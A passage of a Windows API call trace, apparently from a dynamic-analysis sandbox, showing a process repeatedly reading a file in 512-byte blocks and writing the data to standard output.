[0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.232] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.232] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.233] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.233] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.234] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.234] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.236] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.236] GetFileType (hFile=0x50) returned 0x1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, 